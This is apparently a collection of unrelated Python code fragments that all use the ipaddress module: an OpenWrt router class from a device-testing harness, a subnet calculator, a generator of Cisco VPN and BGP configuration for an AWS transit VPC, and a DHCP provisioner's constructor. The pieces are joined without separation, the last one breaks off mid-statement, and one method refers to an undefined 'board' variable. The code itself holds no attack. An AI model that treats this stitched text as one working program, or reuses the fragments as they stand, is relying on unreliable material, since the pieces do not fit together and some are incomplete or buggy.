class OpenWrtRouter(linux.LinuxDevice): ''' Args: model: Examples include "ap148" and "ap135". conn_cmd: Command to connect to device such as "ssh -p 3003 [email protected]" power_ip: IP Address of power unit to which this device is connected power_outlet: Outlet # this device is connected ''' conn_list = None consoles = [] prompt = ['root\\@.*:.*#', '/ # ', '@R7500:/# '] uprompt = ['ath>', r'\(IPQ\) #', 'ar7240>', r'\(IPQ40xx\)'] uboot_eth = "eth0" linux_booted = False saveenv_safe = True lan_gmac_iface = "eth1" lan_iface = "br-lan" wan_iface = "eth0" tftp_server_int = None flash_meta_booted = False has_cmts = False cdrouter_config = None uboot_net_delay = 30 routing = True lan_network = ipaddress.IPv4Network(u"192.168.1.0/24") lan_gateway = ipaddress.IPv4Address(u"192.168.1.1") tmpdir = "/tmp" def __init__(self, model, conn_cmd, power_ip, power_outlet, output=sys.stdout, password='******', web_proxy=None, tftp_server=None, tftp_username=None, tftp_password=None, tftp_port=None, connection_type=None, power_username=None, power_password=None, config=None, **kwargs): self.config = config self.consoles = [self] if type(conn_cmd) is list: self.conn_list = conn_cmd conn_cmd = self.conn_list[0] if connection_type is None: print("\nWARNING: Unknown connection type using ser2net\n") connection_type = "ser2net" self.connection = connection_decider.connection(connection_type, device=self, conn_cmd=conn_cmd, **kwargs) self.connection.connect() self.logfile_read = output self.power = power.get_power_device(power_ip, outlet=power_outlet, username=power_username, password=power_password) self.model = model self.web_proxy = web_proxy if tftp_server: try: self.tftp_server = socket.gethostbyname(tftp_server) if tftp_username: self.tftp_username = tftp_username if tftp_password: self.tftp_password = tftp_password if tftp_port: self.tftp_port = tftp_port except: pass else: self.tftp_server = None atexit.register(self.kill_console_at_exit) def get_file(self, fname, lan_ip=lan_gateway): ''' OpenWrt routers have a webserver, so we use that to download the file via a webproxy (e.g. a device on the board's LAN). ''' if not self.web_proxy: raise Exception('No web proxy defined to access board.') url = 'http://%s/TEMP' % lan_ip self.sendline("\nchmod a+r %s" % fname) self.expect('chmod ') self.expect(self.prompt) self.sendline("ln -sf %s /www/TEMP" % fname) self.expect(self.prompt) proxy = ProxyHandler({'http': self.web_proxy + ':8080'}) opener = build_opener(proxy) install_opener(opener) print("\nAttempting download of %s via proxy %s" % (url, self.web_proxy + ':8080')) return urlopen(url, timeout=30) def tftp_get_file(self, host, filename, timeout=30): '''Download file from tftp server.''' self.sendline("tftp-hpa %s" % host) self.expect("tftp>") self.sendline("get %s" % filename) t = timeout self.expect("tftp>", timeout=t) self.sendline("q") self.expect(self.prompt) self.sendline("ls `basename %s`" % filename) new_fname = os.path.basename(filename) self.expect("%s" % new_fname) self.expect(self.prompt) return new_fname def tftp_get_file_uboot(self, loadaddr, filename, timeout=60): '''Within u-boot, download file from tftp server.''' for _ in range(3): try: self.sendline('help') self.expect_exact('help') self.expect(self.uprompt) if 'tftpboot' in self.before: cmd = 'tftpboot' else: cmd = 'tftp' self.sendline("%s %s %s" % (cmd, loadaddr, filename)) self.expect_exact("%s %s %s" % (cmd, loadaddr, filename)) i = self.expect([r'Bytes transferred = (\d+) (.* hex)'] + self.uprompt, timeout=timeout) if i != 0: continue ret = int(self.match.group(1)) self.expect(self.uprompt) return ret except: print("\nTFTP failed, let us try that again") self.sendcontrol('c') self.expect(self.uprompt) raise Exception("TFTP failed, try rebooting the board.") def prepare_file(self, fname, tserver=None, tusername=None, tpassword=None, tport=None): '''Copy file to tftp server, so that it it available to tftp to the board itself.''' if tserver is None: tserver = self.tftp_server if tusername is None: tusername = self.tftp_username if tpassword is None: tpassword = self.tftp_password if tport is None: tport = self.tftp_port if fname.startswith("http://") or fname.startswith("https://"): return common.download_from_web(fname, tserver, tusername, tpassword, tport) else: return common.scp_to_tftp_server(os.path.abspath(fname), tserver, tusername, tpassword, tport) def install_package(self, fname): '''Install OpenWrt package (opkg).''' target_file = fname.replace('\\', '/').split('/')[-1] new_fname = self.prepare_file(fname) local_file = self.tftp_get_file(self.tftp_server, new_fname, timeout=60) # opkg requires a correct file name self.sendline("mv %s %s" % (local_file, target_file)) self.expect(self.prompt) self.sendline("opkg install --force-downgrade %s" % target_file) self.expect(['Installing', 'Upgrading', 'Downgrading']) self.expect(self.prompt, timeout=60) self.sendline("rm -f /%s" % target_file) self.expect(self.prompt) def wait_for_boot(self): ''' Break into U-Boot. Check memory locations and sizes, and set variables needed for flashing. ''' # Try to break into uboot for _ in range(4): try: self.expect('U-Boot', timeout=30) i = self.expect(['Hit any key ', 'gpio 17 value 1'] + self.uprompt) if i == 1: print( "\n\nWARN: possibly need to hold down reset button to break into U-Boot\n\n" ) self.expect('Hit any key ') self.sendline('\n\n\n\n\n\n\n') # try really hard i = self.expect(['httpd'] + self.uprompt, timeout=4) if i == 0: self.sendcontrol('c') self.sendline('echo FOO') self.expect('echo FOO') self.expect('FOO') self.expect(self.uprompt, timeout=4) break except: print('\n\nFailed to break into uboot, try again.') self.reset() else: # Tried too many times without success print('\nUnable to break into U-Boot, test will likely fail') self.check_memory_addresses() # save env first, so CRC is OK for later tests self.sendline("saveenv") self.expect([ "Writing to Nand... done", "Protected 1 sectors", "Saving Environment to NAND...", 'Saving Environment to FAT...' ]) self.expect(self.uprompt) def network_restart(self): '''Restart networking.''' self.sendline('\nifconfig') self.expect('HWaddr', timeout=10) self.expect(self.prompt) self.sendline('/etc/init.d/network restart') self.expect(self.prompt, timeout=40) self.sendline('ifconfig') self.expect(self.prompt) self.wait_for_network() def firewall_restart(self): '''Restart the firewall. Return how long it took.''' start = datetime.now() self.sendline('/etc/init.d/firewall restart') self.expect_exact([ "Loading redirects", "* Running script '/usr/share/miniupnpd/firewall.include'", "Running script '/etc/firewall.user'" ]) if 'StreamBoost' in self.before: print("test_msg: Sleeping for Streamboost") self.expect(pexpect.TIMEOUT, timeout=45) else: self.expect(pexpect.TIMEOUT, timeout=15) self.expect(self.prompt, timeout=80) return int((datetime.now() - start).seconds) def get_wan_iface(self): '''Return name of WAN interface.''' self.sendline('\nuci show network.wan.ifname') self.expect(r"wan.ifname='?([a-zA-Z0-9\.-]*)'?\r\n", timeout=5) return self.match.group(1) def get_wan_proto(self): '''Return protocol of WAN interface, e.g. dhcp.''' self.sendline('\nuci show network.wan.proto') self.expect(r"wan.proto='?([a-zA-Z0-9\.-]*)'?\r\n", timeout=5) return self.match.group(1) def setup_uboot_network(self, tftp_server=None): if self.tftp_server_int is None: if tftp_server is None: raise Exception("Error in TFTP server configuration") self.tftp_server_int = tftp_server '''Within U-boot, request IP Address, set server IP, and other networking tasks.''' # Use standard eth1 address of wan-side computer self.sendline('setenv autoload no') self.expect(self.uprompt) self.sendline('setenv ethact %s' % self.uboot_eth) self.expect(self.uprompt) self.expect( pexpect.TIMEOUT, timeout=self.uboot_net_delay) # running dhcp too soon causes hang self.sendline('dhcp') i = self.expect(['Unknown command', 'DHCP client bound to address'], timeout=60) self.expect(self.uprompt) if i == 0: self.sendline('setenv ipaddr 192.168.0.2') self.expect(self.uprompt) self.sendline('setenv serverip %s' % self.tftp_server_int) self.expect(self.uprompt) if self.tftp_server_int: passed = False for attempt in range(5): try: self.sendcontrol('c') self.expect('<INTERRUPT>') self.expect(self.uprompt) self.sendline("ping $serverip") self.expect("host %s is alive" % self.tftp_server_int) self.expect(self.uprompt) passed = True break except: print("ping failed, trying again") # Try other interface self.sendcontrol('c') self.expect('<INTERRUPT>') self.expect(self.uprompt) self.sendline('dhcp') self.expect('DHCP client bound to address', timeout=60) self.expect(self.uprompt) self.expect(pexpect.TIMEOUT, timeout=1) assert passed self.sendline('setenv dumpdir crashdump') if self.saveenv_safe: self.expect(self.uprompt) self.sendline('saveenv') self.expect(self.uprompt) def config_wan_proto(self, proto): '''Set protocol for WAN interface.''' if "dhcp" in proto: if self.get_wan_proto() != "dhcp": self.sendline("uci set network.wan.proto=dhcp") self.sendline("uci commit") self.expect(self.prompt) self.network_restart() self.expect(pexpect.TIMEOUT, timeout=10) if "pppoe" in proto: self.wan_iface = "pppoe-wan" if self.get_wan_proto() != "pppoe": self.sendline("uci set network.wan.proto=pppoe") self.sendline("uci commit") self.expect(self.prompt) self.network_restart() self.expect(pexpect.TIMEOUT, timeout=10) def enable_mgmt_gui(self): '''Allow access to webgui from devices on WAN interface ''' self.uci_allow_wan_http(self.lan_gateway) def enable_ssh(self): '''Allow ssh on wan interface ''' self.uci_allow_wan_ssh(self.lan_gateway) def uci_allow_wan_http(self, lan_ip="192.168.1.1"): '''Allow access to webgui from devices on WAN interface.''' self.uci_forward_traffic_redirect("tcp", "80", lan_ip) def uci_allow_wan_ssh(self, lan_ip="192.168.1.1"): self.uci_forward_traffic_redirect("tcp", "22", lan_ip) def uci_allow_wan_https(self): '''Allow access to webgui from devices on WAN interface.''' self.uci_forward_traffic_redirect("tcp", "443", "192.168.1.1") def uci_forward_traffic_redirect(self, tcp_udp, port_wan, ip_lan): self.sendline('uci add firewall redirect') self.expect(self.prompt) self.sendline('uci set firewall.@redirect[-1].src=wan') self.expect(self.prompt) self.sendline('uci set firewall.@redirect[-1].src_dport=%s' % port_wan) self.expect(self.prompt) self.sendline('uci set firewall.@redirect[-1].proto=%s' % tcp_udp) self.expect(self.prompt) self.sendline('uci set firewall.@redirect[-1].dest=lan') self.expect(self.prompt) self.sendline('uci set firewall.@redirect[-1].dest_ip=%s' % ip_lan) self.expect(self.prompt) self.sendline('uci commit firewall') self.expect(self.prompt) self.firewall_restart() def uci_forward_traffic_rule(self, tcp_udp, port, ip, target="ACCEPT"): self.sendline('uci add firewall rule') self.expect(self.prompt) self.sendline('uci set firewall.@rule[-1].src=wan') self.expect(self.prompt) self.sendline('uci set firewall.@rule[-1].proto=%s' % tcp_udp) self.expect(self.prompt) self.sendline('uci set firewall.@rule[-1].dest=lan') self.expect(self.prompt) self.sendline('uci set firewall.@rule[-1].dest_ip=%s' % ip) self.expect(self.prompt) self.sendline('uci set firewall.@rule[-1].dest_port=%s' % port) self.expect(self.prompt) self.sendline('uci set firewall.@rule[-1].target=%s' % target) self.expect(self.prompt) self.sendline('uci commit firewall') self.expect(self.prompt) self.firewall_restart() def wait_for_mounts(self): '''wait for overlay to finish mounting''' for _ in range(5): try: board.sendline('mount') board.expect_exact('overlayfs:/overlay on / type overlay', timeout=15) board.expect(self.prompt) break except: pass else: print("WARN: Overlay still not mounted") def get_dns_server(self): '''Getting dns server ip address ''' return "%s" % self.lan_gateway def get_user_id(self, user_id): self.sendline('cat /etc/passwd | grep -w ' + user_id) idx = self.expect([user_id] + self.prompt) if idx == 0: self.expect(self.prompt) return 0 == idx def get_pp_dev(self): return self def collect_stats(self, stats=[]): pp = self.get_pp_dev() self.stats = [] self.failed_stats = {} for stat in stats: if 'mpstat' in stat: for i in range(5): try: pp.sendcontrol('c') pp.sendline( "kill `ps | grep mpstat | grep -v grep | awk '{print $1}'`" ) pp.expect_exact( "kill `ps | grep mpstat | grep -v grep | awk '{print $1}'`" ) pp.expect(pp.prompt) break except: pp.sendcontrol('d') pp = self.get_pp_dev() if i == 4: print_bold("FAILED TO KILL MPSTAT!") pp.sendcontrol('c') pp.sendline('mpstat -P ALL 5 > %s/mpstat &' % self.tmpdir) if 0 == pp.expect(['mpstat: not found'] + pp.prompt): self.failed_stats['mpstat'] = float('nan') continue elif 0 == pp.expect(['mpstat: not found', pexpect.TIMEOUT], timeout=4): self.failed_stats['mpstat'] = float('nan') continue pp.sendline('ps | grep mpstat') self.stats.append(stat) def parse_stats(self, dict_to_log={}): pp = self.get_pp_dev() if 'mpstat' in self.stats: pp.sendline('ps | grep mpstat') pp.expect_exact('ps | grep mpstat') if 0 == pp.expect([pexpect.TIMEOUT, 'mpstat -P ALL 5'], timeout=5): self.failed_stats['mpstat'] = float('nan') self.stats.remove('mpstat') idx = 0 for _ in range(len(self.stats)): pp.sendline('fg') pp.expect(self.stats) if 'mpstat' in pp.match.group(): pp.sendcontrol('c') pp.expect(pp.prompt) pp.sendline('cat %s/mpstat' % self.tmpdir) pp.expect(['cat %s/mpstat' % self.tmpdir, pexpect.TIMEOUT]) idle_vals = [] start = datetime.now() while 0 == pp.expect( [r'all(\s+\d+\.\d{2}){9}\r\n', pexpect.TIMEOUT] + pp.prompt): idle_vals.append( float(pp.match.group().strip().split(' ')[-1])) if (datetime.now() - start).seconds > 60: self.touch() if len(idle_vals) != 0: avg_cpu_usage = 100 - sum(idle_vals) / len(idle_vals) dict_to_log['mpstat'] = avg_cpu_usage else: dict_to_log['mpstat'] = 0 pp.sendline('rm %s/mpstat' % self.tmpdir) pp.expect([pexpect.TIMEOUT] + pp.prompt) idx += 1 # TODO: verify we got 'em all if idx != len(self.stats): print("WARN: did not match all stats collected!") dict_to_log.update(self.failed_stats)
def findSubnetMask(args): i = str(args.ip).split('/') ip = i[0].split('.') ip = [int(x) for x in ip] netId = [0,0,0,0] subnetting = True if args.s != None else False n = 0 if args.s == None: args.s = 1 try: n = math.ceil(math.log2(args.s)) except ValueError: print('\nNo. of Subnets cannot be 0') return if len(ip) > 4: print('\nInvalid ip address') return if('/' in args.ip): if args.s > 2**(32 - int(i[1])) : print("\nInvalid no. of Subnets") return print('\nClassless') l = cidrSubnetMask(ip,int(i[1]) + n) l = '.'.join(str(x) for x in l) ip = '.'.join(str(x) for x in ip) ip = ip + '/' + str(i[1]) ip = ipaddress.ip_interface(ip) netId = ip.network if args.s != None: network = list(netId.subnets(n)) return printDetail(None,ip,netId,l,network,subnetting) elif('/' not in args.ip): print('\nClassfull') cl = "" if ip[0] in range(1,128): cl = 'A' netId[0] = ip[0] if args.s < 2**24 : l = cidrSubnetMask(ip,n+8) l = '.'.join(str(x) for x in l) ip = '.'.join(str(x) for x in ip) netId = '.'.join(str(x) for x in netId) netId = netId + '/' + str(8) netId = ipaddress.IPv4Network(netId) network = list(netId.subnets(n)) return printDetail(cl,ip,netId,l,network,subnetting) else: print('\nInvalid No. of Subnets') elif ip[0] in range(128,192): cl = 'B' netId[0] = ip[0] netId[1] = ip[1] if args.s < 2**16 : l = cidrSubnetMask(ip,n+16) l = '.'.join(str(x) for x in l) ip = '.'.join(str(x) for x in ip) netId = '.'.join(str(x) for x in netId) netId = netId + '/' + str(16) netId = ipaddress.IPv4Network(netId) network = list(netId.subnets(n)) return printDetail(cl,ip,netId,l,network,subnetting) else: print('\nInvalid No. of Subnets') elif ip[0] in range(192,224): cl = 'C' netId[0] = ip[0] netId[1] = ip[1] netId[2] = ip[2] if args.s < 2**8 : l = cidrSubnetMask(ip,n+24) l = '.'.join(str(x) for x in l) ip = '.'.join(str(x) for x in ip) netId = '.'.join(str(x) for x in netId) netId = netId + '/' + str(24) netId = ipaddress.IPv4Network(netId) network = list(netId.subnets(n)) return printDetail(cl,ip,netId,l,network,subnetting) else: print('\nInvalid No. of Subnets') else: print('\nInvalid Format')
def create_cisco_config(bucket_name, bucket_key, s3_url, bgp_asn, ssh): log.info("Processing %s/%s", bucket_name, bucket_key) #Download the VPN configuration XML document s3 = boto3.client('s3', endpoint_url=s3_url, config=Config(s3={'addressing_style': 'virtual'}, signature_version='s3v4')) config = s3.get_object(Bucket=bucket_name, Key=bucket_key) xmldoc = minidom.parseString(config['Body'].read()) #Extract transit_vpc_configuration values vpn_config = xmldoc.getElementsByTagName("transit_vpc_config")[0] account_id = vpn_config.getElementsByTagName( "account_id")[0].firstChild.data vpn_endpoint = vpn_config.getElementsByTagName( "vpn_endpoint")[0].firstChild.data vpn_status = vpn_config.getElementsByTagName("status")[0].firstChild.data preferred_path = vpn_config.getElementsByTagName( "preferred_path")[0].firstChild.data #Extract VPN connection information vpn_connection = xmldoc.getElementsByTagName('vpn_connection')[0] vpn_connection_id = vpn_connection.attributes['id'].value customer_gateway_id = vpn_connection.getElementsByTagName( "customer_gateway_id")[0].firstChild.data vpn_gateway_id = vpn_connection.getElementsByTagName( "vpn_gateway_id")[0].firstChild.data vpn_connection_type = vpn_connection.getElementsByTagName( "vpn_connection_type")[0].firstChild.data #Determine the VPN tunnels to work with if vpn_status == 'create': tunnelId = getNextTunnelId(ssh) else: tunnelId = getExistingTunnelId(ssh, vpn_connection_id) if tunnelId == 0: return log.info("%s %s with tunnel #%s and #%s.", vpn_status, vpn_connection_id, tunnelId, tunnelId + 1) # Create or delete the VRF for this connection if vpn_status == 'delete': ipsec_tunnel = vpn_connection.getElementsByTagName("ipsec_tunnel")[0] customer_gateway = ipsec_tunnel.getElementsByTagName( "customer_gateway")[0] customer_gateway_bgp_asn = customer_gateway.getElementsByTagName( "bgp")[0].getElementsByTagName("asn")[0].firstChild.data #Remove VPN configuration for both tunnels config_text = ['router bgp {}'.format(customer_gateway_bgp_asn)] config_text.append( ' no address-family ipv4 vrf {}'.format(vpn_connection_id)) config_text.append('exit') config_text.append('no ip vrf {}'.format(vpn_connection_id)) config_text.append('interface Tunnel{}'.format(tunnelId)) config_text.append(' shutdown') config_text.append('exit') config_text.append('no interface Tunnel{}'.format(tunnelId)) config_text.append('interface Tunnel{}'.format(tunnelId + 1)) config_text.append(' shutdown') config_text.append('exit') config_text.append('no interface Tunnel{}'.format(tunnelId + 1)) config_text.append( 'no route-map rm-{} permit'.format(vpn_connection_id)) # Cisco requires waiting 60 seconds before removing the isakmp profile config_text.append('WAIT') config_text.append('WAIT') config_text.append('no crypto isakmp profile isakmp-{}-{}'.format( vpn_connection_id, tunnelId)) config_text.append('no crypto isakmp profile isakmp-{}-{}'.format( vpn_connection_id, tunnelId + 1)) config_text.append('no crypto keyring keyring-{}-{}'.format( vpn_connection_id, tunnelId)) config_text.append('no crypto keyring keyring-{}-{}'.format( vpn_connection_id, tunnelId + 1)) else: # Create global tunnel configuration config_text = ['ip vrf {}'.format(vpn_connection_id)] config_text.append(' rd {}:{}'.format(bgp_asn, tunnelId)) config_text.append(' route-target export {}:0'.format(bgp_asn)) config_text.append(' route-target import {}:0'.format(bgp_asn)) config_text.append('exit') # Check to see if a route map is needed for creating a preferred path if preferred_path != 'none': config_text.append( 'route-map rm-{} permit'.format(vpn_connection_id)) # If the preferred path is this transit VPC vpn endpoint, then set a shorter as-path prepend than if it is not if preferred_path == vpn_endpoint: config_text.append(' set as-path prepend {}'.format(bgp_asn)) else: config_text.append(' set as-path prepend {} {}'.format( bgp_asn, bgp_asn)) config_text.append('exit') # Create tunnel specific configuration for ipsec_tunnel in vpn_connection.getElementsByTagName( "ipsec_tunnel"): customer_gateway = ipsec_tunnel.getElementsByTagName( "customer_gateway")[0] customer_gateway_tunnel_outside_address = customer_gateway.getElementsByTagName( "tunnel_outside_address")[0].getElementsByTagName( "ip_address")[0].firstChild.data customer_gateway_tunnel_inside_address_ip_address = customer_gateway.getElementsByTagName( "tunnel_inside_address")[0].getElementsByTagName( "ip_address")[0].firstChild.data customer_gateway_tunnel_inside_address_network_mask = customer_gateway.getElementsByTagName( "tunnel_inside_address")[0].getElementsByTagName( "network_mask")[0].firstChild.data customer_gateway_tunnel_inside_address_network_cidr = customer_gateway.getElementsByTagName( "tunnel_inside_address")[0].getElementsByTagName( "network_cidr")[0].firstChild.data customer_gateway_bgp_asn = customer_gateway.getElementsByTagName( "bgp")[0].getElementsByTagName("asn")[0].firstChild.data customer_gateway_bgp_hold_time = customer_gateway.getElementsByTagName( "bgp")[0].getElementsByTagName("hold_time")[0].firstChild.data vpn_gateway = ipsec_tunnel.getElementsByTagName("vpn_gateway")[0] vpn_gateway_tunnel_outside_address = vpn_gateway.getElementsByTagName( "tunnel_outside_address")[0].getElementsByTagName( "ip_address")[0].firstChild.data vpn_gateway_tunnel_inside_address_ip_address = vpn_gateway.getElementsByTagName( "tunnel_inside_address")[0].getElementsByTagName( "ip_address")[0].firstChild.data vpn_gateway_tunnel_inside_address_network_mask = vpn_gateway.getElementsByTagName( "tunnel_inside_address")[0].getElementsByTagName( "network_mask")[0].firstChild.data vpn_gateway_tunnel_inside_address_network_cidr = vpn_gateway.getElementsByTagName( "tunnel_inside_address")[0].getElementsByTagName( "network_cidr")[0].firstChild.data vpn_gateway_bgp_asn = vpn_gateway.getElementsByTagName( "bgp")[0].getElementsByTagName("asn")[0].firstChild.data vpn_gateway_bgp_hold_time = vpn_gateway.getElementsByTagName( "bgp")[0].getElementsByTagName("hold_time")[0].firstChild.data ike = ipsec_tunnel.getElementsByTagName("ike")[0] ike_authentication_protocol = ike.getElementsByTagName( "authentication_protocol")[0].firstChild.data ike_encryption_protocol = ike.getElementsByTagName( "encryption_protocol")[0].firstChild.data ike_lifetime = ike.getElementsByTagName( "lifetime")[0].firstChild.data ike_perfect_forward_secrecy = ike.getElementsByTagName( "perfect_forward_secrecy")[0].firstChild.data ike_mode = ike.getElementsByTagName("mode")[0].firstChild.data ike_pre_shared_key = ike.getElementsByTagName( "pre_shared_key")[0].firstChild.data ipsec = ipsec_tunnel.getElementsByTagName("ipsec")[0] ipsec_protocol = ipsec.getElementsByTagName( "protocol")[0].firstChild.data ipsec_authentication_protocol = ipsec.getElementsByTagName( "authentication_protocol")[0].firstChild.data ipsec_encryption_protocol = ipsec.getElementsByTagName( "encryption_protocol")[0].firstChild.data ipsec_lifetime = ipsec.getElementsByTagName( "lifetime")[0].firstChild.data ipsec_perfect_forward_secrecy = ipsec.getElementsByTagName( "perfect_forward_secrecy")[0].firstChild.data ipsec_mode = ipsec.getElementsByTagName("mode")[0].firstChild.data ipsec_clear_df_bit = ipsec.getElementsByTagName( "clear_df_bit")[0].firstChild.data ipsec_fragmentation_before_encryption = ipsec.getElementsByTagName( "fragmentation_before_encryption")[0].firstChild.data ipsec_tcp_mss_adjustment = ipsec.getElementsByTagName( "tcp_mss_adjustment")[0].firstChild.data ipsec_dead_peer_detection_interval = ipsec.getElementsByTagName( "dead_peer_detection")[0].getElementsByTagName( "interval")[0].firstChild.data ipsec_dead_peer_detection_retries = ipsec.getElementsByTagName( "dead_peer_detection")[0].getElementsByTagName( "retries")[0].firstChild.data config_text.append('crypto keyring keyring-{}-{}'.format( vpn_connection_id, tunnelId)) config_text.append(' local-address GigabitEthernet1') config_text.append(' pre-shared-key address {} key {}'.format( vpn_gateway_tunnel_outside_address, ike_pre_shared_key)) config_text.append('exit') config_text.append('crypto isakmp profile isakmp-{}-{}'.format( vpn_connection_id, tunnelId)) config_text.append(' local-address GigabitEthernet1') config_text.append(' match identity address {}'.format( vpn_gateway_tunnel_outside_address)) config_text.append(' keyring keyring-{}-{}'.format( vpn_connection_id, tunnelId)) config_text.append('exit') config_text.append('interface Tunnel{}'.format(tunnelId)) config_text.append( ' description {} from {} to {} for account {}'.format( vpn_connection_id, vpn_gateway_id, customer_gateway_id, account_id)) config_text.append( ' ip vrf forwarding {}'.format(vpn_connection_id)) config_text.append(' ip address {} 255.255.255.252'.format( customer_gateway_tunnel_inside_address_ip_address)) config_text.append(' ip virtual-reassembly') config_text.append(' tunnel source GigabitEthernet1') config_text.append(' tunnel destination {} '.format( vpn_gateway_tunnel_outside_address)) config_text.append(' tunnel mode ipsec ipv4') config_text.append( ' tunnel protection ipsec profile ipsec-vpn-aws') config_text.append(' ip tcp adjust-mss 1387') config_text.append(' no shutdown') config_text.append('exit') config_text.append( 'router bgp {}'.format(customer_gateway_bgp_asn)) config_text.append( ' address-family ipv4 vrf {}'.format(vpn_connection_id)) config_text.append(' neighbor {} remote-as {}'.format( vpn_gateway_tunnel_inside_address_ip_address, vpn_gateway_bgp_asn)) if preferred_path != 'none': config_text.append(' neighbor {} route-map rm-{} out'.format( vpn_gateway_tunnel_inside_address_ip_address, vpn_connection_id)) config_text.append(' neighbor {} timers 10 30 30'.format( vpn_gateway_tunnel_inside_address_ip_address)) config_text.append(' neighbor {} activate'.format( vpn_gateway_tunnel_inside_address_ip_address)) config_text.append(' neighbor {} as-override'.format( vpn_gateway_tunnel_inside_address_ip_address)) config_text.append( ' neighbor {} soft-reconfiguration inbound'.format( vpn_gateway_tunnel_inside_address_ip_address)) config_text.append(' neighbor {} next-hop-self'.format( vpn_gateway_tunnel_inside_address_ip_address)) config_text.append('exit') config_text.append('exit') # the following configuration adds internet routing vpn_gateway_id = getVpnGatewayIdFromVpnConnectionId( vpn_connection_id) vpc_id = getVpcIdFromVpnGatewayId(vpn_gateway_id) spoke_cidr = getVpcSpokeCidrFromVpcId(vpc_id) n = ipaddress.IPv4Network(spoke_cidr.decode('utf-8')) spoke_ip = str(n.network_address) spoke_hostmask = str(n.hostmask) csr_subnet_id = getSubnetIdFromPublicIpAddress( customer_gateway_tunnel_outside_address) csr_cidr = getSubnetCidrFromSubnetId(csr_subnet_id) n = ipaddress.IPv4Network(csr_cidr.decode('utf-8')) csr_default_gateway_ip = str(n[1]) config_text.append( 'router bgp {}'.format(customer_gateway_bgp_asn)) config_text.append( ' address-family ipv4 vrf {}'.format(vpn_connection_id)) config_text.append(' network 0.0.0.0') config_text.append('exit') config_text.append('exit') config_text.append( 'ip route vrf {} 0.0.0.0 0.0.0.0 {} global'.format( vpn_connection_id, csr_default_gateway_ip)) config_text.append('ip access-list standard {}'.format(vpc_id)) config_text.append(' 10 permit {} {}'.format( spoke_ip, spoke_hostmask)) config_text.append('exit') config_text.append('interface GigabitEthernet1') config_text.append(' ip nat outside') config_text.append('exit') config_text.append('interface Tunnel{}'.format(tunnelId)) config_text.append(' ip nat inside') config_text.append('exit') config_text.append( 'ip nat inside source list {} interface GigabitEthernet1 vrf {} overload' .format(vpc_id, vpn_connection_id)) #Increment tunnel ID for going onto the next tunnel tunnelId += 1 log.debug("Conversion complete") return config_text
def __init__(self, *args, **kwargs): self.cm_network = ipaddress.IPv4Network( kwargs.pop('cm_network', u"192.168.200.0/24")) self.cm_gateway = ipaddress.IPv4Address( kwargs.pop('cm_gateway', u"192.168.200.1")) self.mta_network = ipaddress.IPv4Network( kwargs.pop('mta_network', u"192.168.201.0/24")) self.mta_gateway = ipaddress.IPv4Address( kwargs.pop('mta_gateway', u"192.168.201.1")) self.open_network = ipaddress.IPv4Network( kwargs.pop('open_network', u"192.168.202.0/24")) self.open_gateway = ipaddress.IPv4Address( kwargs.pop('open_gateway', u"192.168.202.1")) self.prov_network = ipaddress.IPv4Network( kwargs.pop('prov_network', u"192.168.3.0/24")) self.prov_gateway = ipaddress.IPv4Address( kwargs.pop('prov_gateway', u"192.168.3.222")) self.prov_ip = ipaddress.IPv4Address( kwargs.pop('prov_ip', u"192.168.3.1")) self.prov_iface = ipaddress.IPv6Interface( kwargs.pop('prov_ipv6', u"2001:dead:beef:1::1/%s" % self.ipv6_prefix)) self.prov_ipv6, self.prov_nw_ipv6 = self.prov_iface.ip, self.prov_iface.network self.cm_gateway_v6_iface = ipaddress.IPv6Interface( kwargs.pop('cm_gateway_v6', u"2001:dead:beef:4::cafe/%s" % self.ipv6_prefix)) self.cm_gateway_v6, self.cm_network_v6 = self.cm_gateway_v6_iface.ip, self.cm_gateway_v6_iface.network self.cm_network_v6_start = ipaddress.IPv6Address( kwargs.pop('cm_network_v6_start', u"2001:dead:beef:4::10")) self.cm_network_v6_end = ipaddress.IPv6Address( kwargs.pop('cm_network_v6_end', u"2001:dead:beef:4::100")) self.open_gateway_iface = ipaddress.IPv6Interface( kwargs.pop('open_gateway_v6', u"2001:dead:beef:6::cafe/%s" % self.ipv6_prefix)) self.open_gateway_v6, self.open_network_v6 = self.open_gateway_iface.ip, self.open_gateway_iface.network self.open_network_v6_start = ipaddress.IPv6Address( kwargs.pop('open_network_v6_start', u"2001:dead:beef:6::10")) self.open_network_v6_end = ipaddress.IPv6Address( kwargs.pop('open_network_v6_end', u"2001:dead:beef:6::100")) self.prov_gateway_v6 = ipaddress.IPv6Address( kwargs.pop('prov_gateway_v6', u"2001:dead:beef:1::cafe")) # we're storing a list of all /56 subnets possible from erouter_net_iface. # As per docsis, /56 must be the default pd length self.erouter_net_iface = ipaddress.IPv6Interface( kwargs.pop('erouter_net', u"2001:dead:beef:e000::/51")) self.erouter_net = list( self.erouter_net_iface.network.subnets( 56 - self.erouter_net_iface._prefixlen)) self.sip_fqdn = kwargs.pop( 'sip_fqdn', u"08:54:43:4F:4D:4C:41:42:53:03:43:4F:4D:00") self.time_server = ipaddress.IPv4Address( kwargs.pop('time_server', self.prov_ip)) self.timezone = self.get_timzone_offset(kwargs.pop('timezone', u"UTC")) self.syslog_server = ipaddress.IPv4Address( kwargs.pop('syslog_server', self.prov_ip)) if 'options' in kwargs: options = [x.strip() for x in kwargs['options'].split(',')] for opt in options: # Not a well supported config, will go away at some point if opt.startswith('wan-cmts-provisioner'): self.wan_cmts_provisioner = True self.shared_tftp_server = True # This does run one.. but it's handled via the provisioning code path self.standalone_provisioner = False self.gw = self.prov_ip self.gwv6 = self.prov_ipv6 self.nw = self.prov_network return super(DebianISCProvisioner, self).__init__(*args, **kwargs)
# ----------------------------------------------------------------------------------------NET netDec = str(subnet(ipDec, maskDec)) netBin = numbersToBin(netDec.split(".")) print("\nNetwork decimal:", netDec) file.write("\nNetwork decimal: " + str(netDec) + "\n") print("Network binary:", combineTabToString(netBin)) file.write("Network binary: " + str(combineTabToString(netBin)) + "\n") print("Network class:", ipclass(ip)) file.write("Network class: " + str(ipclass(ip)) + "\n") print("Network type:", publicOrPrivate(ip)) file.write("Network type: " + str(publicOrPrivate(ip)) + "\n") # ----------------------------------------------------------------------------------------BROADCAST broadcastDec = str( ipaddress.IPv4Network(ipDec + '/' + maskDec, False).broadcast_address) broadcastBin = numbersToBin(broadcastDec.split(".")) print("\nBroadcast decimal:", broadcastDec) file.write("\nBroadcast decimal: " + str(broadcastDec) + "\n") print("Broadcast binary:", combineTabToString(broadcastBin)) file.write("Broadcast binary: " + str(combineTabToString(broadcastBin)) + "\n") # ----------------------------------------------------------------------------------------FIRST-HOST firstHostSingle = splittingToSingleNumbers(netBin) i = -1 while firstHostSingle[i] == 1 and i <= -numberOfHostBits: firstHostSingle[i] = 